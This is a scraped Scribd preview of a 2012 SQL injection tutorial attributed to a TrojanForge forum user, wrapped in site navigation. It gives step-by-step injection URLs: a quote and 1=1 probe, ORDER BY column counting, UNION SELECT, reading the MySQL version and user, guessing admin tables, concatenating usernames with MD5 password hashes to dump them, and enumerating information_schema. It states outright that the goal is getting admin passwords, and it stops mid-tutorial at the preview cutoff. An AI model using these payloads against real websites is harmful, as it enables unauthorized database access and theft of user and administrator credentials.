Welcome to Scribd, the world's digital library. Read, publish, and share books and documents. See more
Download
Standard view
Full view
of .
Save to My Library
Look up keyword
Like this
2Activity
0 of .
Results for:
No results containing your search query
P. 1
SQL Injection Tutorial by SlixMe

SQL Injection Tutorial by SlixMe

Ratings: (0)|Views: 195 |Likes:
Published by anon_440252992

More info:

Published by: anon_440252992 on Dec 02, 2012
Copyright:Attribution Non-commercial

Availability:

Read on Scribd mobile: iPhone, iPad and Android.
download as DOCX, PDF, TXT or read online from Scribd
See more
See less

01/12/2013

pdf

text

original

 
SQL Injection Tutorial 
by 
SlixMe@TrojanForge.com
Contact : SlixMe [ at ] jabber.ru
################1. What is SQLi ?################
 SQL Injection is attack that is most often on websites, its done by injection SQL commands toMySQL database to get users/admins password.The vulnerability happens when user input is either incorrectly filtered for string literal escapecharacters embedded in SQL statements or user input is not strongly typed and unexpectedlyexecuted. SQL commands are thus injected from the web form into the database of anapplication (like queries) to change the database content or dump the database information.
################1. Checking vulnerability.################
 There are many ways to check vulnerability here are some..Code:
'+and+1=1'+or+'1'='1'+OR+'x'='x - >x=Anything
So lets take the simplest sting "
'
" now add it to the end of URL for exampleCode:
http://example.com/article.php?id=4123
'
 
Now if the site is vulnerabile you should find an error, error dosent usually mean that the siteis vulnerabile the site could miss some context like images, text, or the whole page.
################2. Getting Columns.################
 It's pretty simple to get columns from website, we use
ORDER BY
- is used to get columnnumbers.Here is an example on our test site:Code:
http://example.com/article.php?id=4123
+order+by+1--
 
After trying order+by+1-- our website opens normaly, lets try ordering columns unit we getsome change on the website.Code:
http://example.com/article.php?id=4123
+order+by+2--
 
Code:
http://example.com/article.php?id=4123
+order+by+3--
 
Code:
http://example.com/article.php?id=4123
+order+by+4--
 
Code:
http://example.com/article.php?id=4123
+order+by+5--
 
Code:
http://example.com/article.php?id=4123
+order+by+6--
 
Code:
http://example.com/article.php?id=4123
+order+by+7--
 
 
Lets say on
order+by+7--
we get some change; example some context is missing....So now we know there are 6 columns, next step is the UNION command
################3. UNION Command.################
 UNION Command helps us to gather data from certain table, for example
UNION SELECT column_name(s) FROM table_name2
 So lets return on our example, union command on our example whould look likeCode:
http://example.com/article.php?id=4123
+union+all+select+1,2,3,4,5,6--
 
Now we should get a valid column on the page so we could use it to get other information'swe need. In some case the valid column is not shown, there is a trick for that, its adding-afterid=-4123The second way is adding before
union
adding
+and+1=1
 Then our example whould look like this:1.Code:
http://example.com/article.php?id=
-
4123+union+all+select+1,2,3,4,5,6--
2.Code:
http://example.com/article.php?id=4123
+and+1=1
+union+all+select+1,2,3,4,5,6--
################4. MySQL Version.################
 After getting valid ( visable ) column its time to check our MySQL Version.So in the valid column typeversion(), it whould display the version of MySQL.Lets say the valid column in our example is 5.Code:
http://example.com/article.php?id=4123+union+all+select+1,2,3,4,
version()
,6--
You should check also:Code:
version()- displays the MySQL versionuser()- displays the MySQL userdatabase()- displays the MySQL databaseIN USE 
There are two types of versions, MySQL 4 & MySQL 5
################5. Table_name & Column_name################
 Now this step is pretty conected to the previous step, if you got MySQL Version 4 you haveto guess tables and columns..Code:
http://example.com/article.php?id=4123+union+all+select+1,2,3,4,5,6+from+
Ta ble
--
The example whould look like thisCode:
http://example.com/article.php?id=4123+union+all+select+1,2,3,4,5,6+from+
ad  min
--
I provided mostly used tables in the next file:Code:
 
http://pastebin.com/raw.php?i=pGUVF8rz
If you get an error, or the context missing you got the wrong table, in case you havent got anyerrors or the page displays the same you got it right..Next step is to get columnsCode:
http://example.com/article.php?id=4123+union+all+select+1,2,3,4,
username
,6+from+admin--
Now the same procedure is getting columns if you got it right you should get username of some user, if not you should get an error then you have to guess the right column name.Let'sguess you got the right columns; username, password.I've provided you the most used columns :Code:
http://pastebin.com/raw.php?i=QriucXqg
Lets get them showing in one statment using
CONCAT
; concat helps you to combine twocolumns. like username: password.Our injection using CONCAT on the table=ADMIN and knowing columns=USERNAME &PASSWORD whould look like this:Code:
http://example.com/article.php?id=4123+union+all+select+1,2,3,4,
concat(colu mn1,column2)
,6+from+admin--
Now we know 2 table names lets concat themCode:
http://example.com/article.php?id=4123+union+all+select+1,2,3,4,
concat(username,password)
,6+from+admin--
Now the output of this injection whould look like:Code:
admin,21232f297a57a5a743894a0e4a801fc3
The password is in MD5 hash I guess you know how to crack them..If you dont like the seperator beetwen the columns you can modify them using HEX.Code:
http://www.ascii.cl/htmlcodes.htm
Find the value of the symbol you want ( HEX Value ), for example " : " Hex value is 3A, nowfor using HEX in SQL you have to put 0x before the hex value in our case it whould look likethis:Code:
http://example.com/article.php?id=4123+union+all+select+1,2,3,4,
concat(username,0x3a,password)
,6+from+admin--
The output whould look likeCode:
admin:21232f297a57a5a743894a0e4a801fc3
Now lets get back to MySQL 5 version.This version is mostly used nowdays, and it has more options which attacker can use.Getting tables in MySQL version 5 is much easier, we use
group_concat
or just
concat
( withLIMIT ) from
information_schema
 Information_schema is an ANSI standard set of read-only views which provide informationabout all of the tables, views, columns, and procedures in a database. It can be used as asource of the information which some databases make available through non-standardcommandsExample of gathering tables from information_schema is :Code:
http://example.com/article.php?id=4123+union+all+select+1,2,3,4,
group_concat(table_name)
,6+from+
infromation_schema.tables
--

You're Reading a Free Preview

Download
/*********** DO NOT ALTER ANYTHING BELOW THIS LINE ! ************/ var s_code=s.t();if(s_code)document.write(s_code)//-->